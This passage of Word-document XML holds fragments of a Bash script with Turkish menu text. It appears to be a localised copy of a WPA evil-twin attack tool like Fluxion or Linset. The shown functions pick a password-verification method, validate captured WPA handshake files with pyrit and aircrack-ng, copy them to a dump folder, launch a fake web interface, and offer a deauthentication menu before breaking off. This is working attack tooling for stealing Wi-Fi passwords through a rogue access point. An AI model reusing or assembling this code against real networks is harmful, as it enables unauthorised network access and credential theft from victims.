        <w:t>conditional_clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AC5995" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F59BB2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6362CB16" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>while true; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6015F983" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4611ED5B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "ŞİFRE DOĞRULAMA YÖNTEMI"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CBA2F0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "                                       "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773693B9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"1)"$yenidenrenklendir" Handshake ("$kirmizi"Önerilir"$yenidenrenklendir")"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CE0570" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"2)"$yenidenrenklendir" wpa_supplicant (Daha az nakit / Daha fazla başarısızlık)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B35C74" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"3)"$yenidenrenklendir" Çıkış"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EE7B8D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "                                       "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6006868B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -n "      #&gt; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756476C8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>read yn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2DD343" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0E8DE0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>case $yn in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3865B0BA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>1 ) authmode="handshake"; handshakelocation; break ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3039AE0E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>2 ) authmode="wpa_supplicant"; certssl; break ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD72ACD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>3 ) askAP; break ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C91BA89" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>* ) echo "Bilinmeyen seçenek.Tekrar seç"; conditional_clear ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DADFF39" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>esac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07250574" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">done </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324EDB27" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="163A40DC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D6FBA8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="79813DA9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function handshakelocation {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E27703B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0980BD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>conditional_clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599CD5DC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C534DB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5889B0E4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>infoap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3553F412" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C716D3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>echo -e "Denetlemek istediğiniz el sıkışmasının yolunu girin (Orn: $kirmizi/root/micaptura.cap$yenidenrenklendir)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C39703" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -e "Varsayilan icin ${sari}ENTER$yenidenrenklendir tusuna basin."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A851965" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2C0039" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -n "Yol: "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46115DF4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -ne "$kirmizi"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234E2BEA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>read handshakeloc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F7746C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -ne "$yenidenrenklendir"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183A007E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0431B087" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if [ "$handshakeloc" = "" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014DDADA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>deauthforce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D18C54" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C012FA8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if [ -f "$handshakeloc" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348E2DC4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Host_SSID_loc=$(pyrit -r "$handshakeloc" analyze 2&gt;&amp;1 | grep "^#" | cut -d "(" -f2 | cut -d "'" -f2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7E7F62" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Host_MAC_loc=$(pyrit -r "$handshakeloc" analyze 2&gt;&amp;1 | grep "^#" | cut -d " " -f3 | tr '[:lower:]' '[:upper:]')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E9C1E0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if [[ "$Host_MAC_loc" == *"$Host_MAC"* ]] &amp;&amp; [[ "$Host_SSID_loc" == *"$Host_SSID"* ]]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABF57BD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if pyrit -r $handshakeloc analyze 2&gt;&amp;1 | sed -n /$(echo $Host_MAC | tr '[:upper:]' '[:lower:]')/,/^#/p | grep -vi "AccessPoint" | grep -qi "good,"; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6995AB53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  <w:t>cp "$handshakeloc" $DUMP_PATH/$Host_MAC-01.cap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDA7BCD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  <w:t>certssl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CC297C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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006054DD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 "El sıkışma tamamlanmamış."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA45B76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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5561AF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sleep 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C91580D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 "Daha bağışlayıcı olduğu için şansınızı aircrack-ng ile deneyebilirsiniz ... "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEB9AFA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 "Tokalaşmayı kontrol etmek için pirit yerine aircrack-ng denemek ister misiniz? [ENTER = HAYIR]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA541C2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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D8A09F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 -n "Respuesta: "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E96B207" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -ne "$kirmizi"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56388E35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read handshakeloc_aircrack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B47506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 -ne "$yenidenrenklendir"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFA44FD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if [ "$handshakeloc_aircrack" = "" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3587A2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  <w:t>handshakelocation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A13714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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACAE365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  <w:t>if aircrack-ng $handshakeloc | grep -q "1 handshake"; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2482472D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cp "$handshakeloc" $DUMP_PATH/$Host_MAC-01.cap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F146A4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webinterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272FCB62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  <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9A4537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echo "El sıkışma bozuk"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5E4E4A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sleep 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EE1160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handshakelocation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001D54F7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  <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005126FB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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445114D8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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75998A61" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5EA35A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 -e "${kirmizi}Error$yenidenrenklendir!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAD6DC4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B58C947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 -e "File ${kirmizi}MAC$yenidenrenklendir"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082E70CE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</w:p>
    <w:p w14:paraId="78AA314D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readarray -t lista_loc &lt; &lt;(pyrit -r $handshakeloc analyze 2&gt;&amp;1 | grep "^#")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34324618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  <w:t>for i in "${lista_loc[@]}"; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B7C896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echo -e "$yesil$(echo $i | cut -d " " -f1) $sari$(echo $i | cut -d " " -f3 | tr '[:lower:]' '[:upper:]')$yenidenrenklendir ($yesil$(echo $i | cut -d "(" -f2 | cut -d "'" -f2)$yenidenrenklendir)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3096C902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  <w:r>
        <w:tab/>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AA1324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</w:r>
    </w:p>
    <w:p w14:paraId="4EAD1582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echo -e "Host ${yesil}MAC$yenidenrenklendir"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611EF65D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "$yesil#1: $sari$Host_MAC$yenidenrenklendir ($yesil$Host_SSID$yenidenrenklendir)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDE3B54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sleep 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1796F4C9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>handshakelocation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153992D2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC246EC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2427B443" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "Archivo ${kirmizi}NO$yenidenrenklendir existe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223B30BA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>sleep 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C926DC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>handshakelocation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E4B736" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F558508" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDD6BC2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7BC206" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="59CF4422" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function deauthforce {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F75B207" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="613BA30A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>conditional_clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EA9112" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCC4299" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1323A002" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>while true; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BE1796" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9BAB70" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "EL SIKIŞMA TÜRÜ KONTROLÜ"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620CA846" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "                                       "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA0754D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"1)"$yenidenrenklendir" aircrack-ng (Başarısızlık olasılıgi dusuk)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C0C5B8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"2)"$yenidenrenklendir" pyrit"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366DE6E8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"3)"$yenidenrenklendir" Çıkış"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31401B90" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "                                       "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036E2F85" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -n "      #&gt; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3521AA61" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>read yn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67921364" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FEE075" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>case $yn in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F5CF61" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>1 ) handshakemode="normal"; askclientsel; break ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E21A522" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>2 ) handshakemode="hard"; askclientsel; break ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC914F1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>3 ) askauth; break ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C354AAD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>* ) echo "Bilinmeyen seçenek.Tekrar seç"; conditional_clear ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437EA2B1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>esac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3443F4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">done </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1FD7CF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA6F6E4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="0C5A68BD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="0370E152" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1C80C548" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Gerçekleştirilecek Atak türü</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131D215E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function askclientsel {</w:t>
      </w:r>
    </w:p>
